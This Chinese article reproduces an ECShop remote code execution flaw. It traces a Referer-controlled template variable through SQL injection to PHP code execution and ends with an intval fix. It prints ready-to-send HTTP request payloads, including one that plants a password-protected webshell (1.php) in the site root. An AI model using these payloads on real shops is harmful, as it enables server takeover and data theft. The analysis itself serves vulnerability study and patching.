ECShop全版本远程代码执行漏洞复现攻略
ECShop全版本远程代码执行漏洞复现攻略:在user.php文件的display函数中,模版变量可控导致注入,通过注入实现远程代码执行。漏洞分析包括SQL注入和代码执行两部分。首先,$back_act变量可被HTTP_REFERER控制,assign函数在模版变量中赋值,display函数读取并解析user_passport.dwt模版文件。insert_mod函数通过动态调用实现注入,配合特定payload可实现SQL注入。进一步通过fetch函数和_eval函数,构造SQL注入并绕过限制,最终实现代码执行,生成1.txt和1.php文件。修复建议是将相关变量转换为整数类型,防止注入攻击。
前言
在user.php
的display
函数中,模版变量可控,导致注入。通过注入,可以实现远程代码执行。
漏洞分析
0x01-SQL注入
首先,我们来看user.php
文件:
$back_act
变量来源于HTTP_REFERER
,我们可以控制这个变量。
assign
函数用于在模版变量中赋值:
接下来,我们来看display
函数:
它读取user_passport.dwt
模版文件的内容,显示解析变量后的HTML内容,并用_echash
进行分割,得到$k
后交给isnert_mod
处理。由于_echash
是默认的,不是随机生成的,所以$val
内容可以随意控制。
再看insert_mod
函数:
这里进行动态调用非常关键,$val
传入时用|
分割,参数传入时需要被序列化。
再看include/lib_insert.php
中的insert_ads
函数:
可以看到这里直接可以注入。
payload:
GET /user.php?act=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
0x02-代码执行
继续查看fetch
函数:
追踪_eval
函数:
$position_style
变量来源于数据库中的查询结构:
然后我们继续构造SQL注入,因为这段SQL操作order by
部分换行了截断不了,所以需要在id
处构造注释来配合num
进行union
查询:
payload:
SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time = '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,2,3,4,5,6,7,8,9,10-- -
函数中有一个判断:
我们id
传入'/*
num
传入*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10-- -
就能绕过了:
var_dump
一下:
再看fetch
函数,传入的参数被fetch_str
函数处理了:
追踪fetch_str
函数,这里的字符串处理流程比较复杂:
return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);
这一行意思是,比如$source
是xxxx{$asd}xxx
,那么经过这行代码处理后就是返回this->select('$asd')
的结果。
看看select
函数:
第一个字符为$
时进入$this->get_val
函数:
我们$val
没有.
又进入make_var
函数:
最后这里引入单引号从变量中逃逸:
我们要闭合_var
,所以最终payload是:
{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ=='));//}xxx
会在网站根目录生成1.txt
,里面内容是getshell
:
GETSHELL exp:
GET /user.php?act=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
会在网站根目录生成1.php
,密码是1337
。
修复建议
将$arr['id']
和$arr['num']
转换为整数类型,使用intval
函数。
好了,本文到此结束,带大家了解了《ECShop全版本远程代码执行漏洞复现攻略》,希望本文对你有所帮助!关注golang学习网公众号,给大家分享更多文章知识!

- 上一篇
- DebianOpenSSL提升系统安全性攻略

- 下一篇
- MySQL新手必备基础命令及操作指南
-
- 文章 · 软件教程 | 6分钟前 |
- Win10邮件日历更新:图标全面改版升级
- 478浏览 收藏
-
- 文章 · 软件教程 | 18分钟前 |
- Win10网关消失怎么修复?
- 375浏览 收藏
-
- 文章 · 软件教程 | 21分钟前 | win10 移动热点
- Win10无法开启移动热点怎么解决
- 135浏览 收藏
-
- 文章 · 软件教程 | 25分钟前 |
- Win11截图保存位置怎么改
- 435浏览 收藏
-
- 文章 · 软件教程 | 27分钟前 | win11 时间同步
- Win11时间不同步解决方法及NTP故障处理
- 430浏览 收藏
-
- 文章 · 软件教程 | 30分钟前 |
- Windows7蓝屏关机解决技巧
- 194浏览 收藏
-
- 文章 · 软件教程 | 31分钟前 | win11 广告推送
- Win11关闭广告推送方法大全
- 418浏览 收藏
-
- 文章 · 软件教程 | 38分钟前 |
- Win8分区合并失败怎么解决
- 118浏览 收藏
-
- 文章 · 软件教程 | 42分钟前 |
- TRC文件怎么打开?详解与方法
- 239浏览 收藏
-
- 文章 · 软件教程 | 47分钟前 |
- 电脑黑屏只剩鼠标箭头怎么处理
- 134浏览 收藏
-
- 文章 · 软件教程 | 1小时前 |
- 笔记本接电不充电怎么处理
- 301浏览 收藏
-
- 文章 · 软件教程 | 1小时前 |
- Windows10系统安装教程详解
- 408浏览 收藏
-
- 前端进阶之JavaScript设计模式
- 设计模式是开发人员在软件开发过程中面临一般问题时的解决方案,代表了最佳的实践。本课程的主打内容包括JS常见设计模式以及具体应用场景,打造一站式知识长龙服务,适合有JS基础的同学学习。
- 542次学习
-
- GO语言核心编程课程
- 本课程采用真实案例,全面具体可落地,从理论到实践,一步一步将GO核心编程技术、编程思想、底层实现融会贯通,使学习者贴近时代脉搏,做IT互联网时代的弄潮儿。
- 508次学习
-
- 简单聊聊mysql8与网络通信
- 如有问题加微信:Le-studyg;在课程中,我们将首先介绍MySQL8的新特性,包括性能优化、安全增强、新数据类型等,帮助学生快速熟悉MySQL8的最新功能。接着,我们将深入解析MySQL的网络通信机制,包括协议、连接管理、数据传输等,让
- 497次学习
-
- JavaScript正则表达式基础与实战
- 在任何一门编程语言中,正则表达式,都是一项重要的知识,它提供了高效的字符串匹配与捕获机制,可以极大的简化程序设计。
- 487次学习
-
- 从零制作响应式网站—Grid布局
- 本系列教程将展示从零制作一个假想的网络科技公司官网,分为导航,轮播,关于我们,成功案例,服务流程,团队介绍,数据部分,公司动态,底部信息等内容区块。网站整体采用CSSGrid布局,支持响应式,有流畅过渡和展现动画。
- 484次学习
-
- 茅茅虫AIGC检测
- 茅茅虫AIGC检测,湖南茅茅虫科技有限公司倾力打造,运用NLP技术精准识别AI生成文本,提供论文、专著等学术文本的AIGC检测服务。支持多种格式,生成可视化报告,保障您的学术诚信和内容质量。
- 127次使用
-
- 赛林匹克平台(Challympics)
- 探索赛林匹克平台Challympics,一个聚焦人工智能、算力算法、量子计算等前沿技术的赛事聚合平台。连接产学研用,助力科技创新与产业升级。
- 146次使用
-
- 笔格AIPPT
- SEO 笔格AIPPT是135编辑器推出的AI智能PPT制作平台,依托DeepSeek大模型,实现智能大纲生成、一键PPT生成、AI文字优化、图像生成等功能。免费试用,提升PPT制作效率,适用于商务演示、教育培训等多种场景。
- 145次使用
-
- 稿定PPT
- 告别PPT制作难题!稿定PPT提供海量模板、AI智能生成、在线协作,助您轻松制作专业演示文稿。职场办公、教育学习、企业服务全覆盖,降本增效,释放创意!
- 133次使用
-
- Suno苏诺中文版
- 探索Suno苏诺中文版,一款颠覆传统音乐创作的AI平台。无需专业技能,轻松创作个性化音乐。智能词曲生成、风格迁移、海量音效,释放您的音乐灵感!
- 148次使用
-
- pe系统下载好如何重装的具体教程
- 2023-05-01 501浏览
-
- qq游戏大厅怎么开启蓝钻提醒功能-qq游戏大厅开启蓝钻提醒功能教程
- 2023-04-29 501浏览
-
- 吉吉影音怎样播放网络视频 吉吉影音播放网络视频的操作步骤
- 2023-04-09 501浏览
-
- 腾讯会议怎么使用电脑音频 腾讯会议播放电脑音频的方法
- 2023-04-04 501浏览
-
- PPT制作图片滚动效果的简单方法
- 2023-04-26 501浏览